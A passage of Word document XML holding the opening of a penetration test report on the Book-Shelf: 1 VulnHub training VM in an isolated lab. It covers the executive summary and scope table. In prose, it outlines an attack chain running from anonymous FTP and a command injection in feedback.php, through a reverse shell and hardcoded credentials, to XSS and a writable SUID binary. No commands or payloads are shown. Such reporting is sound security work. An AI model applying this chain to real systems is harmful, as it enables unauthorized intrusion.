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A8E45" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00C64CEA">
      <w:pPr>
        <w:spacing w:before="2000"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C40C602" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF90581" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Book-Shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>: 1 — Internal Lab Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B550A57" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="900"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187A9BC7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Book-Shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 1 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Training </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>VM) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.76.157</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B6D18C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assessment Type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A91C0CD" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Authorized Internal Penetration Test — Isolated Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349E4341" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assessment Date:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686D2BB" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>August 23–24, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4F19A9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prepared For:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E985E69" w14:textId="3FA71BD0" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00ED1762">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t>Khaled Gamal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A98EC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prepared By:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427940BE" w14:textId="3C202172" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Mohammed</w:t>
      </w:r>
      <w:r w:rsidR="00ED1762">
        <w:t xml:space="preserve"> Hany Mamdouh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Penetration Testing Consultant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B59CE7" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CONFIDENTIAL — For authorized recipients only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125128A1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9072BE" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00C64CEA">
      <w:pPr>
        <w:sectPr w:rsidR="00C64CEA">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="168EBD17" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF8DB91" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720C3D10" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This report presents the results of an authorized penetration test conducted against the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Book-Shelf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>: 1 training virtual machine (target IP 192.168.76.157) from a Kali Linux attacker host (192.168.76.128), within an isolated VMware lab network. The objective of the engagement was to identify and validate security weaknesses across network services, the web application, and the underlying host, including authentication issues, information disclosure, injection vulnerabilities, remote code execution, and privilege escalation opportunities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8F8486" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Overall Security Posture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDBF04E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The assessment identified multiple confirmed vulnerabilities of varying severity. The most significant issue is an unauthenticated OS command injection vulnerability in the web application's feedback functionality, which was successfully exploited to obtain remote code execution and an interactive reverse shell as the web server user (www-data). This was compounded by hardcoded application credentials disclosed in server-side PHP source code, unauthenticated access to an administrative/profile page, a reflected cross-site scripting weakness, anonymous FTP access exposing a sensitive file, and a world-writable SUID binary that represents a plausible (but not demonstrated) path to privilege escalation. Taken together, these findings indicate that the target's web application and supporting services were, at the time of testing, exposed to significant risk of compromise from an unauthenticated network position.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669EC231" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Most Critical Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738CB42E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OS Command Injection / Remote Code Execution in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>feedback.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Critical) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> confirmed arbitrary command execution as www-data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E93581" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Hardcoded Credentials in PHP Source Code (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>High) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> valid application credentials disclosed and confirmed against the login endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B68C2D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Unauthenticated Access to Admin/Profile Page (High/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Medium) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a profile page was reachable without any authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2C6CFF" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Writable SUID Binary (High-risk misconfiguration, unproven </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exploit) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a world-writable, SUID-set binary was identified; exploitation to escalate privileges was attempted but not successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295E3387" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Anonymous FTP Access / Information Disclosure (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Medium) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> anonymous FTP exposed a password-style wordlist file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEB810F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Reflected Cross-Site Scripting (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Medium) —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> unsafe reflection of user input in an HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC2ED12" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Attack Path Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470DB676" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attack chain began with anonymous FTP access, which exposed a wordlist file (webpass.txt) containing an application-specific credential fragment. Web enumeration of the application uncovered a feedback endpoint containing a hidden, Base64-encoded hint pointing to a "path" parameter. This parameter proved vulnerable to OS command injection, which was leveraged to obtain a reverse shell as </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>www-data. From this foothold, further enumeration of the web root revealed PHP source code containing hardcoded login credentials, which were confirmed valid against the application's login endpoint and led to an admin/profile page — a page that was also found to be reachable without authentication at all. Additional weaknesses were identified in a separate reflected XSS-prone endpoint. Privilege escalation from www-data to the local defender or root account was investigated (including a world-writable SUID binary) but was not successfully demonstrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741DAE7F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>High-Level Risk Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BC31FA" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The combination of an internet/network-reachable command injection vulnerability and hardcoded credentials constitutes a critical risk: an unauthenticated attacker on the network could gain code execution on the host and access to application-level data with minimal effort. While full host compromise (root access) was not demonstrated during this engagement, the presence of a writable SUID binary alongside weak file-permission hygiene suggests that privilege escalation may be achievable with further effort and should be treated as a high priority for remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD616C5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Scope and Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3439F6" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Target Information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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C64CEA" w14:paraId="7FE6FE97" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11A08DA1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57660552" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="28295596" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5BC1E4F5" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38797FD1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Book-Shelf</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>: 1 (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VulnHub</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Training VM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="2C3167E2" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54C51B1B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Target IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28ADBCD1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.76.157</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="040F4785" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E6B074A" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attacker (Kali Linux) IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B0398F1" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.76.128</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="1B2E93BD" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5937776E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F3F4F6"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FEDA70E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Isolated VMware lab network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C64CEA" w14:paraId="4F43DDA7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3500" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64E6705B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Engagement Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5850" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="777143D3" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authorized internal / lab penetration test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
